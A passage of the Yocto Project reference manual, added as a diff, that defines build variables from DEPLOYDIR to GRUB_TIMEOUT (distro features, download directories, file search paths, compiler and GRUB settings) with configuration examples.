+ :ref:`ref-tasks-package_write_tar` task
+ writes TAR packages into the appropriate folder. For more information
+ on how packaging works, see the ":ref:`Package
+ Feeds <package-feeds-dev-environment>`" section
+ in the Yocto Project Overview and Concepts Manual.
+
+ :term:`DEPLOYDIR`
+ When inheriting the :ref:`deploy <ref-classes-deploy>` class, the
+ ``DEPLOYDIR`` points to a temporary work area for deployed files that
+ is set in the ``deploy`` class as follows:
+ ::
+
+ DEPLOYDIR = "${WORKDIR}/deploy-${PN}"
+
+ Recipes inheriting the ``deploy`` class should copy files to be
+ deployed into ``DEPLOYDIR``, and the class will take care of copying
+ them into :term:`DEPLOY_DIR_IMAGE`
+ afterwards.
+
+ :term:`DESCRIPTION`
+ The package description used by package managers. If not set,
+ ``DESCRIPTION`` takes the value of the :term:`SUMMARY`
+ variable.
+
+ :term:`DISTRO`
+ The short name of the distribution. For information on the long name
+ of the distribution, see the :term:`DISTRO_NAME`
+ variable.
+
+ The ``DISTRO`` variable corresponds to a distribution configuration
+ file whose root name is the same as the variable's argument and whose
+ filename extension is ``.conf``. For example, the distribution
+ configuration file for the Poky distribution is named ``poky.conf``
+ and resides in the ``meta-poky/conf/distro`` directory of the
+ :term:`Source Directory`.
+
+ Within that ``poky.conf`` file, the ``DISTRO`` variable is set as
+ follows:
+ ::
+
+ DISTRO = "poky"
+
+ Distribution configuration files are located in a ``conf/distro``
+ directory within the :term:`Metadata` that contains the
+ distribution configuration. The value for ``DISTRO`` must not contain
+ spaces, and is typically all lower-case.
+
+ .. note::
+
+ If the ``DISTRO`` variable is blank, a set of default configurations
+ are used, which are specified within
+ ``meta/conf/distro/defaultsetup.conf`` also in the Source Directory.
+
+ :term:`DISTRO_CODENAME`
+ Specifies a codename for the distribution being built.
+
+ :term:`DISTRO_EXTRA_RDEPENDS`
+ Specifies a list of distro-specific packages to add to all images.
+ This variable takes affect through ``packagegroup-base`` so the
+ variable only really applies to the more full-featured images that
+ include ``packagegroup-base``. You can use this variable to keep
+ distro policy out of generic images. As with all other distro
+ variables, you set this variable in the distro ``.conf`` file.
+
+ :term:`DISTRO_EXTRA_RRECOMMENDS`
+ Specifies a list of distro-specific packages to add to all images if
+ the packages exist. The packages might not exist or be empty (e.g.
+ kernel modules). The list of packages are automatically installed but
+ you can remove them.
+
+ :term:`DISTRO_FEATURES`
+ The software support you want in your distribution for various
+ features. You define your distribution features in the distribution
+ configuration file.
+
+ In most cases, the presence or absence of a feature in
+ ``DISTRO_FEATURES`` is translated to the appropriate option supplied
+ to the configure script during the
+ :ref:`ref-tasks-configure` task for recipes that
+ optionally support the feature. For example, specifying "x11" in
+ ``DISTRO_FEATURES``, causes every piece of software built for the
+ target that can optionally support X11 to have its X11 support
+ enabled.
+
+ Two more examples are Bluetooth and NFS support. For a more complete
+ list of features that ships with the Yocto Project and that you can
+ provide with this variable, see the ":ref:`ref-features-distro`" section.
+
+ :term:`DISTRO_FEATURES_BACKFILL`
+ Features to be added to ``DISTRO_FEATURES`` if not also present in
+ ``DISTRO_FEATURES_BACKFILL_CONSIDERED``.
+
+ This variable is set in the ``meta/conf/bitbake.conf`` file. It is
+ not intended to be user-configurable. It is best to just reference
+ the variable to see which distro features are being backfilled for
+ all distro configurations. See the ":ref:`ref-features-backfill`" section
+ for more information.
+
+ :term:`DISTRO_FEATURES_BACKFILL_CONSIDERED`
+ Features from ``DISTRO_FEATURES_BACKFILL`` that should not be
+ backfilled (i.e. added to ``DISTRO_FEATURES``) during the build. See
+ the ":ref:`ref-features-backfill`" section for more information.
+
+ :term:`DISTRO_FEATURES_DEFAULT`
+ A convenience variable that gives you the default list of distro
+ features with the exception of any features specific to the C library
+ (``libc``).
+
+ When creating a custom distribution, you might find it useful to be
+ able to reuse the default
+ :term:`DISTRO_FEATURES` options without the
+ need to write out the full set. Here is an example that uses
+ ``DISTRO_FEATURES_DEFAULT`` from a custom distro configuration file:
+ ::
+
+ DISTRO_FEATURES ?= "${DISTRO_FEATURES_DEFAULT} myfeature"
+
+ :term:`DISTRO_FEATURES_FILTER_NATIVE`
+ Specifies a list of features that if present in the target
+ :term:`DISTRO_FEATURES` value should be
+ included in ``DISTRO_FEATURES`` when building native recipes. This
+ variable is used in addition to the features filtered using the
+ :term:`DISTRO_FEATURES_NATIVE`
+ variable.
+
+ :term:`DISTRO_FEATURES_FILTER_NATIVESDK`
+ Specifies a list of features that if present in the target
+ :term:`DISTRO_FEATURES` value should be
+ included in ``DISTRO_FEATURES`` when building nativesdk recipes. This
+ variable is used in addition to the features filtered using the
+ :term:`DISTRO_FEATURES_NATIVESDK`
+ variable.
+
+ :term:`DISTRO_FEATURES_NATIVE`
+ Specifies a list of features that should be included in
+ :term:`DISTRO_FEATURES` when building native
+ recipes. This variable is used in addition to the features filtered
+ using the
+ :term:`DISTRO_FEATURES_FILTER_NATIVE`
+ variable.
+
+ :term:`DISTRO_FEATURES_NATIVESDK`
+ Specifies a list of features that should be included in
+ :term:`DISTRO_FEATURES` when building
+ nativesdk recipes. This variable is used in addition to the features
+ filtered using the
+ :term:`DISTRO_FEATURES_FILTER_NATIVESDK`
+ variable.
+
+ :term:`DISTRO_NAME`
+ The long name of the distribution. For information on the short name
+ of the distribution, see the :term:`DISTRO` variable.
+
+ The ``DISTRO_NAME`` variable corresponds to a distribution
+ configuration file whose root name is the same as the variable's
+ argument and whose filename extension is ``.conf``. For example, the
+ distribution configuration file for the Poky distribution is named
+ ``poky.conf`` and resides in the ``meta-poky/conf/distro`` directory
+ of the :term:`Source Directory`.
+
+ Within that ``poky.conf`` file, the ``DISTRO_NAME`` variable is set
+ as follows:
+ ::
+
+ DISTRO_NAME = "Poky (Yocto Project Reference Distro)"
+
+ Distribution configuration files are located in a ``conf/distro``
+ directory within the :term:`Metadata` that contains the
+ distribution configuration.
+
+ .. note::
+
+ If the ``DISTRO_NAME`` variable is blank, a set of default
+ configurations are used, which are specified within
+ ``meta/conf/distro/defaultsetup.conf`` also in the Source Directory.
+
+ :term:`DISTRO_VERSION`
+ The version of the distribution.
+
+ :term:`DISTROOVERRIDES`
+ A colon-separated list of overrides specific to the current
+ distribution. By default, this list includes the value of
+ :term:`DISTRO`.
+
+ You can extend ``DISTROOVERRIDES`` to add extra overrides that should
+ apply to the distribution.
+
+ The underlying mechanism behind ``DISTROOVERRIDES`` is simply that it
+ is included in the default value of
+ :term:`OVERRIDES`.
+
+ :term:`DL_DIR`
+ The central download directory used by the build process to store
+ downloads. By default, ``DL_DIR`` gets files suitable for mirroring
+ for everything except Git repositories. If you want tarballs of Git
+ repositories, use the
+ :term:`BB_GENERATE_MIRROR_TARBALLS`
+ variable.
+
+ You can set this directory by defining the ``DL_DIR`` variable in the
+ ``conf/local.conf`` file. This directory is self-maintaining and you
+ should not have to touch it. By default, the directory is
+ ``downloads`` in the :term:`Build Directory`.
+ ::
+
+ #DL_DIR ?= "${TOPDIR}/downloads"
+
+ To specify a different download directory,
+ simply remove the comment from the line and provide your directory.
+
+ During a first build, the system downloads many different source code
+ tarballs from various upstream projects. Downloading can take a
+ while, particularly if your network connection is slow. Tarballs are
+ all stored in the directory defined by ``DL_DIR`` and the build
+ system looks there first to find source tarballs.
+
+ .. note::
+
+ When wiping and rebuilding, you can preserve this directory to
+ speed up this part of subsequent builds.
+
+ You can safely share this directory between multiple builds on the
+ same development machine. For additional information on how the build
+ process gets source files when working behind a firewall or proxy
+ server, see this specific question in the ":doc:`faq`"
+ chapter. You can also refer to the
+ ":yocto_wiki:`Working Behind a Network Proxy </wiki/Working_Behind_a_Network_Proxy>`"
+ Wiki page.
+
+ :term:`DOC_COMPRESS`
+ When inheriting the :ref:`compress_doc <ref-classes-compress_doc>`
+ class, this variable sets the compression policy used when the
+ OpenEmbedded build system compresses man pages and info pages. By
+ default, the compression method used is gz (gzip). Other policies
+ available are xz and bz2.
+
+ For information on policies and on how to use this variable, see the
+ comments in the ``meta/classes/compress_doc.bbclass`` file.
+
+ :term:`EFI_PROVIDER`
+ When building bootable images (i.e. where ``hddimg``, ``iso``, or
+ ``wic.vmdk`` is in :term:`IMAGE_FSTYPES`), the
+ ``EFI_PROVIDER`` variable specifies the EFI bootloader to use. The
+ default is "grub-efi", but "systemd-boot" can be used instead.
+
+ See the :ref:`systemd-boot <ref-classes-systemd-boot>` and
+ :ref:`image-live <ref-classes-image-live>` classes for more
+ information.
+
+ :term:`ENABLE_BINARY_LOCALE_GENERATION`
+ Variable that controls which locales for ``glibc`` are generated
+ during the build (useful if the target device has 64Mbytes of RAM or
+ less).
+
+ :term:`ERR_REPORT_DIR`
+ When used with the :ref:`report-error <ref-classes-report-error>`
+ class, specifies the path used for storing the debug files created by
+ the :ref:`error reporting
+ tool <dev-manual/dev-manual-common-tasks:using the error reporting tool>`, which
+ allows you to submit build errors you encounter to a central
+ database. By default, the value of this variable is
+ ``${``\ :term:`LOG_DIR`\ ``}/error-report``.
+
+ You can set ``ERR_REPORT_DIR`` to the path you want the error
+ reporting tool to store the debug files as follows in your
+ ``local.conf`` file:
+ ::
+
+ ERR_REPORT_DIR = "path"
+
+ :term:`ERROR_QA`
+ Specifies the quality assurance checks whose failures are reported as
+ errors by the OpenEmbedded build system. You set this variable in
+ your distribution configuration file. For a list of the checks you
+ can control with this variable, see the
+ ":ref:`insane.bbclass <ref-classes-insane>`" section.
+
+ :term:`EXCLUDE_FROM_SHLIBS`
+ Triggers the OpenEmbedded build system's shared libraries resolver to
+ exclude an entire package when scanning for shared libraries.
+
+ .. note::
+
+ The shared libraries resolver's functionality results in part from
+ the internal function ``package_do_shlibs``, which is part of the
+ :ref:`ref-tasks-package` task. You should be aware that the shared
+ libraries resolver might implicitly define some dependencies between
+ packages.
+
+ The ``EXCLUDE_FROM_SHLIBS`` variable is similar to the
+ :term:`PRIVATE_LIBS` variable, which excludes a
+ package's particular libraries only and not the whole package.
+
+ Use the ``EXCLUDE_FROM_SHLIBS`` variable by setting it to "1" for a
+ particular package:
+ ::
+
+ EXCLUDE_FROM_SHLIBS = "1"
+
+ :term:`EXCLUDE_FROM_WORLD`
+ Directs BitBake to exclude a recipe from world builds (i.e.
+ ``bitbake world``). During world builds, BitBake locates, parses and
+ builds all recipes found in every layer exposed in the
+ ``bblayers.conf`` configuration file.
+
+ To exclude a recipe from a world build using this variable, set the
+ variable to "1" in the recipe.
+
+ .. note::
+
+ Recipes added to ``EXCLUDE_FROM_WORLD`` may still be built during a
+ world build in order to satisfy dependencies of other recipes. Adding
+ a recipe to ``EXCLUDE_FROM_WORLD`` only ensures that the recipe is not
+ explicitly added to the list of build targets in a world build.
+
+ :term:`EXTENDPE`
+ Used with file and pathnames to create a prefix for a recipe's
+ version based on the recipe's :term:`PE` value. If ``PE``
+ is set and greater than zero for a recipe, ``EXTENDPE`` becomes that
+ value (e.g if ``PE`` is equal to "1" then ``EXTENDPE`` becomes "1").
+ If a recipe's ``PE`` is not set (the default) or is equal to zero,
+ ``EXTENDPE`` becomes "".
+
+ See the :term:`STAMP` variable for an example.
+
+ :term:`EXTENDPKGV`
+ The full package version specification as it appears on the final
+ packages produced by a recipe. The variable's value is normally used
+ to fix a runtime dependency to the exact same version of another
+ package in the same recipe:
+ ::
+
+ RDEPENDS_${PN}-additional-module = "${PN} (= ${EXTENDPKGV})"
+
+ The dependency relationships are intended to force the package
+ manager to upgrade these types of packages in lock-step.
+
+ :term:`EXTERNAL_KERNEL_TOOLS`
+ When set, the ``EXTERNAL_KERNEL_TOOLS`` variable indicates that these
+ tools are not in the source tree.
+
+ When kernel tools are available in the tree, they are preferred over
+ any externally installed tools. Setting the ``EXTERNAL_KERNEL_TOOLS``
+ variable tells the OpenEmbedded build system to prefer the installed
+ external tools. See the
+ :ref:`kernel-yocto <ref-classes-kernel-yocto>` class in
+ ``meta/classes`` to see how the variable is used.
+
+ :term:`EXTERNALSRC`
+ When inheriting the :ref:`externalsrc <ref-classes-externalsrc>`
+ class, this variable points to the source tree, which is outside of
+ the OpenEmbedded build system. When set, this variable sets the
+ :term:`S` variable, which is what the OpenEmbedded build
+ system uses to locate unpacked recipe source code.
+
+ For more information on ``externalsrc.bbclass``, see the
+ ":ref:`externalsrc.bbclass <ref-classes-externalsrc>`" section. You
+ can also find information on how to use this variable in the
+ ":ref:`dev-manual/dev-manual-common-tasks:building software from an external source`"
+ section in the Yocto Project Development Tasks Manual.
+
+ :term:`EXTERNALSRC_BUILD`
+ When inheriting the :ref:`externalsrc <ref-classes-externalsrc>`
+ class, this variable points to the directory in which the recipe's
+ source code is built, which is outside of the OpenEmbedded build
+ system. When set, this variable sets the :term:`B` variable,
+ which is what the OpenEmbedded build system uses to locate the Build
+ Directory.
+
+ For more information on ``externalsrc.bbclass``, see the
+ ":ref:`externalsrc.bbclass <ref-classes-externalsrc>`" section. You
+ can also find information on how to use this variable in the
+ ":ref:`dev-manual/dev-manual-common-tasks:building software from an external source`"
+ section in the Yocto Project Development Tasks Manual.
+
+ :term:`EXTRA_AUTORECONF`
+ For recipes inheriting the :ref:`autotools <ref-classes-autotools>`
+ class, you can use ``EXTRA_AUTORECONF`` to specify extra options to
+ pass to the ``autoreconf`` command that is executed during the
+ :ref:`ref-tasks-configure` task.
+
+ The default value is "--exclude=autopoint".
+
+ :term:`EXTRA_IMAGE_FEATURES`
+ A list of additional features to include in an image. When listing
+ more than one feature, separate them with a space.
+
+ Typically, you configure this variable in your ``local.conf`` file,
+ which is found in the :term:`Build Directory`.
+ Although you can use this variable from within a recipe, best
+ practices dictate that you do not.
+
+ .. note::
+
+ To enable primary features from within the image recipe, use the
+ :term:`IMAGE_FEATURES` variable.
+
+ Here are some examples of features you can add:
+
+ - "dbg-pkgs" - Adds -dbg packages for all installed packages including
+ symbol information for debugging and profiling.
+
+ - "debug-tweaks" - Makes an image suitable for debugging. For example, allows root logins without passwords and
+ enables post-installation logging. See the 'allow-empty-password' and
+ 'post-install-logging' features in the ":ref:`ref-features-image`"
+ section for more information.
+ - "dev-pkgs" - Adds -dev packages for all installed packages. This is
+ useful if you want to develop against the libraries in the image.
+ - "read-only-rootfs" - Creates an image whose root filesystem is
+ read-only. See the
+ ":ref:`dev-manual/dev-manual-common-tasks:creating a read-only root filesystem`"
+ section in the Yocto Project Development Tasks Manual for more
+ information
+ - "tools-debug" - Adds debugging tools such as gdb and strace.
+ - "tools-sdk" - Adds development tools such as gcc, make,
+ pkgconfig and so forth.
+ - "tools-testapps" - Adds useful testing tools
+ such as ts_print, aplay, arecord and so forth.
+
+ For a complete list of image features that ships with the Yocto
+ Project, see the ":ref:`ref-features-image`" section.
+
+ For an example that shows how to customize your image by using this
+ variable, see the ":ref:`usingpoky-extend-customimage-imagefeatures`"
+ section in the Yocto Project Development Tasks Manual.
+
+ :term:`EXTRA_IMAGECMD`
+ Specifies additional options for the image creation command that has
+ been specified in :term:`IMAGE_CMD`. When setting
+ this variable, use an override for the associated image type. Here is
+ an example:
+ ::
+
+ EXTRA_IMAGECMD_ext3 ?= "-i 4096"
+
+ :term:`EXTRA_IMAGEDEPENDS`
+ A list of recipes to build that do not provide packages for
+ installing into the root filesystem.
+
+ Sometimes a recipe is required to build the final image but is not
+ needed in the root filesystem. You can use the ``EXTRA_IMAGEDEPENDS``
+ variable to list these recipes and thus specify the dependencies. A
+ typical example is a required bootloader in a machine configuration.
+
+ .. note::
+
+ To add packages to the root filesystem, see the various
+ \*:term:`RDEPENDS` and \*:term:`RRECOMMENDS` variables.
+
+ :term:`EXTRANATIVEPATH`
+ A list of subdirectories of
+ ``${``\ :term:`STAGING_BINDIR_NATIVE`\ ``}``
+ added to the beginning of the environment variable ``PATH``. As an
+ example, the following prepends
+ "${STAGING_BINDIR_NATIVE}/foo:${STAGING_BINDIR_NATIVE}/bar:" to
+ ``PATH``:
+ ::
+
+ EXTRANATIVEPATH = "foo bar"
+
+ :term:`EXTRA_OECMAKE`
+ Additional `CMake <https://cmake.org/overview/>`__ options. See the
+ :ref:`cmake <ref-classes-cmake>` class for additional information.
+
+ :term:`EXTRA_OECONF`
+ Additional ``configure`` script options. See
+ :term:`PACKAGECONFIG_CONFARGS` for
+ additional information on passing configure script options.
+
+ :term:`EXTRA_OEMAKE`
+ Additional GNU ``make`` options.
+
+ Because the ``EXTRA_OEMAKE`` defaults to "", you need to set the
+ variable to specify any required GNU options.
+
+ :term:`PARALLEL_MAKE` and
+ :term:`PARALLEL_MAKEINST` also make use of
+ ``EXTRA_OEMAKE`` to pass the required flags.
+
+ :term:`EXTRA_OESCONS`
+ When inheriting the :ref:`scons <ref-classes-scons>` class, this
+ variable specifies additional configuration options you want to pass
+ to the ``scons`` command line.
+
+ :term:`EXTRA_USERS_PARAMS`
+ When inheriting the :ref:`extrausers <ref-classes-extrausers>`
+ class, this variable provides image level user and group operations.
+ This is a more global method of providing user and group
+ configuration as compared to using the
+ :ref:`useradd <ref-classes-useradd>` class, which ties user and
+ group configurations to a specific recipe.
+
+ The set list of commands you can configure using the
+ ``EXTRA_USERS_PARAMS`` is shown in the ``extrausers`` class. These
+ commands map to the normal Unix commands of the same names:
+ ::
+
+ # EXTRA_USERS_PARAMS = "\
+ # useradd -p '' tester; \
+ # groupadd developers; \
+ # userdel nobody; \
+ # groupdel -g video; \
+ # groupmod -g 1020 developers; \
+ # usermod -s /bin/sh tester; \
+ # "
+
+ :term:`FEATURE_PACKAGES`
+ Defines one or more packages to include in an image when a specific
+ item is included in :term:`IMAGE_FEATURES`.
+ When setting the value, ``FEATURE_PACKAGES`` should have the name of
+ the feature item as an override. Here is an example:
+ ::
+
+ FEATURE_PACKAGES_widget = "package1 package2"
+
+ In this example, if "widget" were added to ``IMAGE_FEATURES``,
+ package1 and package2 would be included in the image.
+
+ .. note::
+
+ Packages installed by features defined through ``FEATURE_PACKAGES``
+ are often package groups. While similarly named, you should not
+ confuse the ``FEATURE_PACKAGES`` variable with package groups, which
+ are discussed elsewhere in the documentation.
+
+ :term:`FEED_DEPLOYDIR_BASE_URI`
+ Points to the base URL of the server and location within the
+ document-root that provides the metadata and packages required by
+ OPKG to support runtime package management of IPK packages. You set
+ this variable in your ``local.conf`` file.
+
+ Consider the following example:
+ ::
+
+ FEED_DEPLOYDIR_BASE_URI = "http://192.168.7.1/BOARD-dir"
+
+ This example assumes you are serving
+ your packages over HTTP and your databases are located in a directory
+ named ``BOARD-dir``, which is underneath your HTTP server's
+ document-root. In this case, the OpenEmbedded build system generates
+ a set of configuration files for you in your target that work with
+ the feed.
+
+ :term:`FILES`
+ The list of files and directories that are placed in a package. The
+ :term:`PACKAGES` variable lists the packages
+ generated by a recipe.
+
+ To use the ``FILES`` variable, provide a package name override that
+ identifies the resulting package. Then, provide a space-separated
+ list of files or paths that identify the files you want included as
+ part of the resulting package. Here is an example:
+ ::
+
+ FILES_${PN} += "${bindir}/mydir1 ${bindir}/mydir2/myfile"
+
+ .. note::
+
+ - When specifying files or paths, you can pattern match using
+ Python's
+ `glob <https://docs.python.org/3/library/glob.html>`_
+ syntax. For details on the syntax, see the documentation by
+ following the previous link.
+
+ - When specifying paths as part of the ``FILES`` variable, it is
+ good practice to use appropriate path variables. For example,
+ use ``${sysconfdir}`` rather than ``/etc``, or ``${bindir}``
+ rather than ``/usr/bin``. You can find a list of these
+ variables at the top of the ``meta/conf/bitbake.conf`` file in
+ the :term:`Source Directory`. You will also
+ find the default values of the various ``FILES_*`` variables in
+ this file.
+
+ If some of the files you provide with the ``FILES`` variable are
+ editable and you know they should not be overwritten during the
+ package update process by the Package Management System (PMS), you
+ can identify these files so that the PMS will not overwrite them. See
+ the :term:`CONFFILES` variable for information on
+ how to identify these files to the PMS.
+
+ :term:`FILES_SOLIBSDEV`
+ Defines the file specification to match
+ :term:`SOLIBSDEV`. In other words,
+ ``FILES_SOLIBSDEV`` defines the full path name of the development
+ symbolic link (symlink) for shared libraries on the target platform.
+
+ The following statement from the ``bitbake.conf`` shows how it is
+ set:
+ ::
+
+ FILES_SOLIBSDEV ?= "${base_libdir}/lib*${SOLIBSDEV} ${libdir}/lib*${SOLIBSDEV}"
+
+ :term:`FILESEXTRAPATHS`
+ Extends the search path the OpenEmbedded build system uses when
+ looking for files and patches as it processes recipes and append
+ files. The default directories BitBake uses when it processes recipes
+ are initially defined by the :term:`FILESPATH`
+ variable. You can extend ``FILESPATH`` variable by using
+ ``FILESEXTRAPATHS``.
+
+ Best practices dictate that you accomplish this by using
+ ``FILESEXTRAPATHS`` from within a ``.bbappend`` file and that you
+ prepend paths as follows:
+ ::
+
+ FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
+
+ In the above example, the build system first
+ looks for files in a directory that has the same name as the
+ corresponding append file.
+
+ .. note::
+
+ When extending ``FILESEXTRAPATHS``, be sure to use the immediate
+ expansion (``:=``) operator. Immediate expansion makes sure that
+ BitBake evaluates :term:`THISDIR` at the time the
+ directive is encountered rather than at some later time when
+ expansion might result in a directory that does not contain the
+ files you need.
+
+ Also, include the trailing separating colon character if you are
+ prepending. The trailing colon character is necessary because you
+ are directing BitBake to extend the path by prepending directories
+ to the search path.
+
+ Here is another common use:
+ ::
+
+ FILESEXTRAPATHS_prepend := "${THISDIR}/files:"
+
+ In this example, the build system extends the
+ ``FILESPATH`` variable to include a directory named ``files`` that is
+ in the same directory as the corresponding append file.
+
+ This next example specifically adds three paths:
+ ::
+
+ FILESEXTRAPATHS_prepend := "path_1:path_2:path_3:"
+
+ A final example shows how you can extend the search path and include
+ a :term:`MACHINE`-specific override, which is useful
+ in a BSP layer:
+ ::
+
+ FILESEXTRAPATHS_prepend_intel-x86-common := "${THISDIR}/${PN}:"
+
+ The previous statement appears in the
+ ``linux-yocto-dev.bbappend`` file, which is found in the
+ :ref:`overview-manual/overview-manual-development-environment:yocto project source repositories` in
+ ``meta-intel/common/recipes-kernel/linux``. Here, the machine
+ override is a special :term:`PACKAGE_ARCH`
+ definition for multiple ``meta-intel`` machines.
+
+ .. note::
+
+ For a layer that supports a single BSP, the override could just be
+ the value of ``MACHINE``.
+
+ By prepending paths in ``.bbappend`` files, you allow multiple append
+ files that reside in different layers but are used for the same
+ recipe to correctly extend the path.
+
+ :term:`FILESOVERRIDES`
+ A subset of :term:`OVERRIDES` used by the
+ OpenEmbedded build system for creating
+ :term:`FILESPATH`. The ``FILESOVERRIDES`` variable
+ uses overrides to automatically extend the
+ :term:`FILESPATH` variable. For an example of how
+ that works, see the :term:`FILESPATH` variable
+ description. Additionally, you find more information on how overrides
+ are handled in the
+ ":ref:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata:conditional syntax (overrides)`"
+ section of the BitBake User Manual.
+
+ By default, the ``FILESOVERRIDES`` variable is defined as:
+ ::
+
+ FILESOVERRIDES = "${TRANSLATED_TARGET_ARCH}:${MACHINEOVERRIDES}:${DISTROOVERRIDES}"
+
+ .. note::
+
+ Do not hand-edit the ``FILESOVERRIDES`` variable. The values match up
+ with expected overrides and are used in an expected manner by the
+ build system.
+
+ :term:`FILESPATH`
+ The default set of directories the OpenEmbedded build system uses
+ when searching for patches and files.
+
+ During the build process, BitBake searches each directory in
+ ``FILESPATH`` in the specified order when looking for files and
+ patches specified by each ``file://`` URI in a recipe's
+ :term:`SRC_URI` statements.
+
+ The default value for the ``FILESPATH`` variable is defined in the
+ ``base.bbclass`` class found in ``meta/classes`` in the
+ :term:`Source Directory`:
+ ::
+
+ FILESPATH = "${@base_set_filespath(["${FILE_DIRNAME}/${BP}", \
+ "${FILE_DIRNAME}/${BPN}", "${FILE_DIRNAME}/files"], d)}"
+
+ The
+ ``FILESPATH`` variable is automatically extended using the overrides
+ from the :term:`FILESOVERRIDES` variable.
+
+ .. note::
+
+ - Do not hand-edit the ``FILESPATH`` variable. If you want the
+ build system to look in directories other than the defaults,
+ extend the ``FILESPATH`` variable by using the
+ :term:`FILESEXTRAPATHS` variable.
+
+ - Be aware that the default ``FILESPATH`` directories do not map
+ to directories in custom layers where append files
+ (``.bbappend``) are used. If you want the build system to find
+ patches or files that reside with your append files, you need
+ to extend the ``FILESPATH`` variable by using the
+ ``FILESEXTRAPATHS`` variable.
+
+ You can take advantage of this searching behavior in useful ways. For
+ example, consider a case where the following directory structure
+ exists for general and machine-specific configurations:
+ ::
+
+ files/defconfig
+ files/MACHINEA/defconfig
+ files/MACHINEB/defconfig
+
+ Also in the example, the ``SRC_URI`` statement contains
+ "file://defconfig". Given this scenario, you can set
+ :term:`MACHINE` to "MACHINEA" and cause the build
+ system to use files from ``files/MACHINEA``. Set ``MACHINE`` to
+ "MACHINEB" and the build system uses files from ``files/MACHINEB``.
+ Finally, for any machine other than "MACHINEA" and "MACHINEB", the
+ build system uses files from ``files/defconfig``.
+
+ You can find out more about the patching process in the
+ ":ref:`patching-dev-environment`" section
+ in the Yocto Project Overview and Concepts Manual and the
+ ":ref:`new-recipe-patching-code`" section in
+ the Yocto Project Development Tasks Manual. See the
+ :ref:`ref-tasks-patch` task as well.
+
+ :term:`FILESYSTEM_PERMS_TABLES`
+ Allows you to define your own file permissions settings table as part
+ of your configuration for the packaging process. For example, suppose
+ you need a consistent set of custom permissions for a set of groups
+ and users across an entire work project. It is best to do this in the
+ packages themselves but this is not always possible.
+
+ By default, the OpenEmbedded build system uses the ``fs-perms.txt``,
+ which is located in the ``meta/files`` folder in the :term:`Source Directory`.
+ If you create your own file
+ permissions setting table, you should place it in your layer or the
+ distro's layer.
+
+ You define the ``FILESYSTEM_PERMS_TABLES`` variable in the
+ ``conf/local.conf`` file, which is found in the :term:`Build Directory`,
+ to point to your custom
+ ``fs-perms.txt``. You can specify more than a single file permissions
+ setting table. The paths you specify to these files must be defined
+ within the :term:`BBPATH` variable.
+
+ For guidance on how to create your own file permissions settings
+ table file, examine the existing ``fs-perms.txt``.
+
+ :term:`FIT_HASH_ALG`
+ Specifies the hash algorithm used in creating the FIT Image. For e.g. sha256.
+
+ :term:`FIT_SIGN_ALG`
+ Specifies the signature algorithm used in creating the FIT Image.
+ For e.g. rsa2048.
+
+ :term:`FONT_EXTRA_RDEPENDS`
+ When inheriting the :ref:`fontcache <ref-classes-fontcache>` class,
+ this variable specifies the runtime dependencies for font packages.
+ By default, the ``FONT_EXTRA_RDEPENDS`` is set to "fontconfig-utils".
+
+ :term:`FONT_PACKAGES`
+ When inheriting the :ref:`fontcache <ref-classes-fontcache>` class,
+ this variable identifies packages containing font files that need to
+ be cached by Fontconfig. By default, the ``fontcache`` class assumes
+ that fonts are in the recipe's main package (i.e.
+ ``${``\ :term:`PN`\ ``}``). Use this variable if fonts you
+ need are in a package other than that main package.
+
+ :term:`FORCE_RO_REMOVE`
+ Forces the removal of the packages listed in ``ROOTFS_RO_UNNEEDED``
+ during the generation of the root filesystem.
+
+ Set the variable to "1" to force the removal of these packages.
+
+ :term:`FULL_OPTIMIZATION`
+ The options to pass in ``TARGET_CFLAGS`` and ``CFLAGS`` when
+ compiling an optimized system. This variable defaults to "-O2 -pipe
+ ${DEBUG_FLAGS}".
+
+ :term:`GCCPIE`
+ Enables Position Independent Executables (PIE) within the GNU C
+ Compiler (GCC). Enabling PIE in the GCC makes Return Oriented
+ Programming (ROP) attacks much more difficult to execute.
+
+ By default the ``security_flags.inc`` file enables PIE by setting the
+ variable as follows:
+ ::
+
+ GCCPIE ?= "--enable-default-pie"
+
+ :term:`GCCVERSION`
+ Specifies the default version of the GNU C Compiler (GCC) used for
+ compilation. By default, ``GCCVERSION`` is set to "8.x" in the
+ ``meta/conf/distro/include/tcmode-default.inc`` include file:
+ ::
+
+ GCCVERSION ?= "8.%"
+
+ You can override this value by setting it in a
+ configuration file such as the ``local.conf``.
+
+ :term:`GDB`
+ The minimal command and arguments to run the GNU Debugger.
+
+ :term:`GITDIR`
+ The directory in which a local copy of a Git repository is stored
+ when it is cloned.
+
+ :term:`GLIBC_GENERATE_LOCALES`
+ Specifies the list of GLIBC locales to generate should you not wish
+ to generate all LIBC locals, which can be time consuming.
+
+ .. note::
+
+ If you specifically remove the locale ``en_US.UTF-8``, you must set
+ :term:`IMAGE_LINGUAS` appropriately.
+
+ You can set ``GLIBC_GENERATE_LOCALES`` in your ``local.conf`` file.
+ By default, all locales are generated.
+ ::
+
+ GLIBC_GENERATE_LOCALES = "en_GB.UTF-8 en_US.UTF-8"
+
+ :term:`GROUPADD_PARAM`
+ When inheriting the :ref:`useradd <ref-classes-useradd>` class,
+ this variable specifies for a package what parameters should be
+ passed to the ``groupadd`` command if you wish to add a group to the
+ system when the package is installed.
+
+ Here is an example from the ``dbus`` recipe:
+ ::
+
+ GROUPADD_PARAM_${PN} = "-r netdev"
+
+ For information on the standard Linux shell command
+ ``groupadd``, see http://linux.die.net/man/8/groupadd.
+
+ :term:`GROUPMEMS_PARAM`
+ When inheriting the :ref:`useradd <ref-classes-useradd>` class,
+ this variable specifies for a package what parameters should be
+ passed to the ``groupmems`` command if you wish to modify the members
+ of a group when the package is installed.
+
+ For information on the standard Linux shell command ``groupmems``,
+ see http://linux.die.net/man/8/groupmems.
+
+ :term:`GRUB_GFXSERIAL`
+ Configures the GNU GRand Unified Bootloader (GRUB) to have graphics
+ and serial in the boot menu. Set this variable to "1" in your
+ ``local.conf`` or distribution configuration file to enable graphics
+ and serial in the menu.
+
+ See the :ref:`grub-efi <ref-classes-grub-efi>` class for more
+ information on how this variable is used.
+
+ :term:`GRUB_OPTS`
+ Additional options to add to the GNU GRand Unified Bootloader (GRUB)
+ configuration. Use a semi-colon character (``;``) to separate
+ multiple options.
+
+ The ``GRUB_OPTS`` variable is optional. See the
+ :ref:`grub-efi <ref-classes-grub-efi>` class for more information
+ on how this variable is used.
+
+ :term:`GRUB_TIMEOUT`
+ Specifies the timeout before executing the default ``LABEL`` in the
+ GNU GRand Unified Bootloader (GRUB).
+
